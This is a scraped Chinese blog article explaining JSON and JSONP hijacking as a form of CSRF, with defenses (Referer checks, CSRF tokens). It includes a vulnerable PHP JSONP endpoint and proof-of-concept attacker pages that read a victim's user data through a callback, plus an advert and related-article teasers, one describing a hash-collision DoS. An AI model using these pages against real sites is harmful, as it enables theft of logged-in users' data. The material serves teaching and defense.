php csrf jsonp,详解JSON和JSONP劫持检测代码以及解决方法

最新推荐文章于 2024-04-25 14:01:36 发布
最新推荐文章于 2024-04-25 14:01:36 发布
阅读量169 收藏
点赞数
文章标签: php csrf jsonp
本文探讨了JSON劫持攻击的概念,如何通过script标签利用已有用户的cookie获取敏感数据,以及JSONP的安全隐患。重点介绍了防范方法,如验证Referer头和使用CSRF Token。同时,给出了JSONP劫持的实例和解决策略。
摘要由CSDN通过智能技术生成

json劫持

json劫持攻击又为”JSON Hijacking”,攻击过程有点类似于csrf,只不过csrf只管发送http请求,但是json-hijack的目的是获取敏感数据。

一些web应用会把一些敏感数据以json的形式返回到前端,如果仅仅通过cookie来判断请求是否合法,那么就可以利用类似csrf的手段,向目标服务器发送请求,以获得敏感数据。

比如下面的链接在已登录的情况下会返回json格式的用户信息:

攻击者可以在自己的虚假页面中,加入如下标签:

1

"

>

如果当前浏览器已经登录了,并且cookie未过期,然后访问了攻击者的虚假页面,那么该页面就可以拿到json形式的用户敏感信息,因为script标签会自动解析json数据,生成对应的js对象。然后再通过

1

Object.prototype.__defineSetter__

这个函数来触发自己的恶意代码。

IIS7网站监控可以及时防控网站风险,快速准确监控网站是否遭到各种劫持攻击,网站在全国是否能正常打开(查看域名是否被墙),精准的DNS污染检测,具备网站打开速度检测功能,第一时间知道网站是否被黑、被入侵、被改标题、被挂黑链。精益求精的产品,缺陷为零数据提供!

它可以做到以下功能:

1、

检测网站是否被黑

2、检测网站是否被劫持

3、检测域名是否被墙

4、检测DNS是否被污染

5、网站真实的完全打开时间(独家)

6、拥有独立监控后台,24小时定时监控域名

官方地址:

官方图:

0b4c86e2f86e8b0ba9722015c7838b9d.png

c544d38e96ccd03d700227f700608d0b.png

但是这个函数在当前的新版本chrome和firefox中都已经失效了。

jsonp劫持

jsonp是一个非官方的协议,利用script元素的开放策略,网页可以得到从其他来源动态产生的json数据,因此可以用来实现跨域。(关于JSONP可以参考我的博文:

)

web程序如果通过这种方式跨域之后,攻击者完全可以在自己的虚假页面中发起恶意的jsonp请求,这就引来了安全问题。比如:

1

2

3

4

5

6

function

useUserInfo(v){

alert(v.username);

}

"

>

如果服务器端的userinfo接口支持jsonp,那就会使虚假页面成功执行useUserInfo函数,从而导致安全问题。

解决方法

其实json劫持和jsonp劫持属于CSRF( Cross-site request forgery 跨站请求伪造)的攻击范畴,所以解决的方法和解决csrf的方法一样。

1、验证 HTTP Referer 头信息;

2、在请求中添加 csrfToken 并在后端进行验证;

关于CSRF攻击可以参考我的博文:

PS:JSONP劫持漏洞实例

getUser.php

1

2

3

4

5

6

7

8

header(

'Content-type: application/json'

);

$jsoncallback

= htmlspecialchars(

$_REQUEST

[

'jsoncallback'

]);

//获取回调函数名

//json数据

//$json_data = '["id","user"]';

$json_data

=

'({"id":"1","name":"Aaron"})'

;

echo

$jsoncallback

.

"("

.

$json_data

.

")"

;

//输出jsonp格式的数据

?>

Payload利用:

客户端实现 callbackFunction 函数

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

<

html

>

<

head

>

<

meta

charset

=

"utf-8"

>

<

title

>JSONP劫持测试

title

>

head

>

<

body

>

<

script

type

=

"text/javascript"

>

function callbackFunction(result)

{

alert(result.name);

}

script

>

<

script

type

=

"text/javascript"

src

=

"

"

>

script

>

body

>

html

>

jQuery 使用 JSONP

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

<

html

>

<

head

>

<

meta

charset

=

"utf-8"

>

<

title

>JSONP劫持测试

title

>

<

script

src

=

"

"

>

script

>

head

>

<

body

>

<

div

id

=

"divCustomers"

>

div

>

<

script

type

=

"text/javascript"

>

$.getJSON("

", function(getUsers){

alert(getUsers.name);

});

script

>

body

>

html

>

盾牌座
关注
JSON劫持攻击[汇总]
浪子燕青的博客
02-25 3015
title: JSON劫持攻击[汇总] copyright: true top: 0 date: 2018-08-14 09:58:52 tags: JSON劫持 categories: 渗透测试 permalink: password: keywords: description: JSON是一种轻量级的数据交换格式,而劫持就是对数据进行窃取。 你感觉到了吗?我的血液是热的,可我的心是冷的 JSON 劫持又为“ JSON Hijacking ”,最开始提出这个概念大概是在 2008 年国外有安全研究人.
JSONP Hijackin攻击详解
m0_37595954的博客
01-06 350
JSONP Hijackin的中文意思是JSON劫持,而能产生JSON数据劫持的原因在于前端被跨站攻击了。跨站=跨域,跨域从字面上理解的话,就是指超出了范围、领域。继续追问一下,那超出了什么范围?原来指的范围有多大?理解跨站攻击的基础在于理解这个域有多大。为了更准确的理解JSON Hijackin攻击,建议读者可以先了解一下如下几个背景知识: 域概念 (下文会介绍) JSON (搜索引擎查一...
前端知识点-jsonp csrf
weixin_34104341的博客
02-19 108
jsonp详解ajax的核心是通过XmlHttpRequest获取非本页内容jsonp的核心则是动态添加<script>标签来调用服务器提供的js脚本。利用script标签绕过同源策略,获得一个类似这样的数据,jsonpcallback是页面存在的回调方法,参数就是想得到的json。参考文章:http://www.cnblogs.com/yuzhongwusan/...
分享一个jsonp劫持造成的新浪某社区CSRF蠕虫
Coisini的博客
06-15 450
最近jsonp很火,实话说已经是被玩烂了的,只是一直没有受到大家的重视。正好在上个月,我挖过一个由于jsonp造成的新浪某社区CSRF,当时是为了准备一篇文章,之后这篇文章也会拿出来分享。 因为新浪已经修复了问题,所以我先把这个漏洞分享出来。以下是当时写的部分文章。 0x01 引子 听说新浪五月送衣服,我其实也没太多空去挖洞。本来想交一个两年前挖的CSRF刷粉,结果拿出来一看那洞早没了,目标站都...
csrf攻击中的jsonp
标子 的专栏
08-25 1041
假设我的网站代码为                    function fun(x){       alert(x)     }             如果www.normal.com是通过jsonp的方式获取数据的,那么用户在登录www.normal.com的时候,如果访问了我的网站,那么我就能获取该用户的信息。
json劫持
buptisc_txy的专栏
12-19 1177
竟然会有这个。估计很多地方都没不会注意这个。 文章来源:http://haacked.com/archive/2008/11/20/anatomy-of-a-subtle-json-vulnerability.aspx 道理大约说下。黑客在自己的页面中重定义了array函数。然后利用了 When you visit the page, you will see the following alert dialog…
详解JSONJSONP劫持以及解决方法
10-17
在这篇文章中,将详细介绍JSONJSONP劫持的原理、攻击方式以及有效的解决方法。 首先,了解JSON劫持,也就是JSON Hijacking。这种攻击方式类似于CSRF(跨站请求伪造),但其目的在于获取敏感数据。在JSON劫持中,...
详解JSONJSONP劫持以及解决方法.docx
01-22
"详解JSONJSONP劫持以及解决方法" 本文主要介绍了JSONJSONP劫持的概念、攻击过程、解决方法以及实例代码,旨在帮助读者深入理解这两种攻击方式,并提供实际有效的解决方法JSON劫持 JSON劫持,也称为JSON ...
【漏洞利用】JSONP跨域请求漏洞 挖掘、利用详解
weixin_44023442的博客
03-13 3289
参考文章 轻松搞定JSONP跨域请求 jsonp跨域原理,使用以及同源策略 跨域漏洞丨JSONP和CORS跨域资源共享 Tag: Ref: [[019.同源策略]] 本片文章仅供学习使用,切勿触犯法律! 未写完,待补充 概述 总结 一、漏洞介绍 JSONP介绍 JSONPJSON with padding(填充式 JSON 或参数式 JSON)的简写。 JSONP是一种利用HTML中<script></script>元素标签,远程调用json文件来实现数据传递的技术,
JSON劫持
m0_51822230的博客
04-25 1457
【技术工场】“JSON劫持漏洞”分析 2019-05-29 17:30 // 转载 前 言 JSON(Java Object Notation) 是一种轻量级的数据交换格式,易于阅读和编写,同时也易于机器解析和生成。 JSON采用完全独立于语言的文本格式,但是也使用了类似于C语言家族的习惯。这些特性使JSON成为理想的数据交换语言。 这种纯文本的数据交互方式由于可以天然的在浏览器中使用,所以随着ajax和web业务的发展得到了广大的发展,但是如果这种交互的方式用来传递敏感的数据,并且传输的时
php-dos-attack:利用PHPjson_decode漏洞
05-13
PHP服务器上模拟哈希冲突攻击 签出。 这个怎么运作 PHP哈希表容易受到复杂性攻击。 因此,每个需要外部输入并在PHP哈希表中进行解析的函数都容易受到复杂性攻击。 测试PHP漏洞以进行碰撞攻击 在目录test ,有PHP脚本演示了使用PHP映射的函数的漏洞。 文件collision_keys_small.txt仅包含1万个条目。 如果您想测试真实交易,则应使用collision_keys.txt (64k条目)尝试这些攻击。 运行测试 运行测试以将冲突键插入数组: docker run -it \ -v "$PWD":/usr/src/app -w /usr/src/app php:5.6-cli \ php test/array.php collision_keys.txt 运行测试以针对具有冲突键的JSON键值对调用json_decode : docker run -it -
json劫持攻击
mgxcool的专栏
06-11 6270
攻击过程有点类似于csrf,只不过csrf只管发送http请求,但是json-hijack的目的是获取敏感数据。 一些web应用会把一些敏感数据以json的形式返回到前端,如果仅仅通过cookie来判断请求是否合法,那么就可以利用类似csrf的手段,像目标服务器发送请求,以获得敏感数据。 攻击者可以在虚假页面中,加入如下标签: 加入www.bank.com/userinf
jsonp劫持
m0_51553670的博客
07-29 1561
JSON指的是JavaScript对象表示法( JavaScript Object Notation)JSON是轻量级的文本数据交换格式JSON是存储和交换文本信息的语法,类似XML但JSON比XML更小、更快、更易解析C、Python、C++、Java、PHP、Go等编程语言都支持JSON几乎所有编程语言都有解析JSON的库,而在JavaScript中,我们可以直接使用JSON,因为JavaScript内置了JSON的解析。
JSON劫持与while(1)
最新发布
分享不一样的技术,与你一起共同成长!
04-25 590
JSON 劫持,也称为“JavaScript 对象表示不法劫持”。当应用程序没有适当地防范此类攻击时,此漏洞允许攻击者从受害者的浏览器中窃取敏感数据。JSON 劫持利用同源策略,这是一种安全措施,可防止网页向与提供网页的域不同的域发出请求。这是通过查询资料找到关于什么"JSON劫持"的解释.这个JSON劫持一般发生与JSONPCSRF跨站伪造请求有点异曲同工之处...
Jsonp劫持
Sentiment的博客
07-25 953
我们知道,在JSONP跨域中,我们是可以传入一个函数名的参数如callback,然后JSONP端点会根据我们的传参动态生成JSONP数据响应回来。如果JSONP端点对于用于传入的函数名参数callback处理不当,如未正确设置响应包的Content-Type、未对用户输入参数进行有效过滤或转义时,就会导致XSS漏洞的产生。jsonp.php} else {请求后触发xss,此时发现php默认的content-type为text/html。
php csrf jsonp,JSONP绕过CSRF防护token
weixin_33601504的博客
03-25 271
第一次遇到了jsonp劫持漏洞,并且通过此漏洞绕过token进行成功的csrf攻击JSONP什么是jsonpJsonp(JSON with Padding) 是 json 的一种"使用模式",可以让网页从别的域名(网站)那获取资料,即跨域读取数据。JSONP的语法和JSON很像,简单来说就是在JSON外部用一个函数包裹着。JSONP基本语法如下:callback({ "name": "kwan"...
json劫持学习
qq_46804551的博客
10-12 682
JSON劫持 json劫持攻击又为”JSON Hijacking”,攻击过程有点类似于csrf,只不过csrf只管发送http请求,但是json-hijack的目的是获取敏感数据。 一些web应用会把一些敏感数据以json的形式返回到前端,如果仅仅通过cookie来判断请求是否合法,那么就可以利用类似csrf的手段,向目标服务器发送请求,以获得敏感数据。 靶场练习 POC <!DOCTYPE html> <html lang="en"> <head> <m
jsonp 监控简陋代码
weixin_30631587的博客
05-19 64
url: window.location.href Agent: navigator.userAgent var tkInfo = { VisitUrl: window.location.href, UserAgent: Visit.Agent, SolutionCatalog...
csrf jsonp
08-12
JSONPJSON with Padding)是一种跨域请求的解决方案之一。JSONP通过在前端页面动态生成标签,将请求发送到其他域名的服务器,并在响应中返回一个回调函数的调用。这样,前端页面就可以通过回调函数获取到跨域请求...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值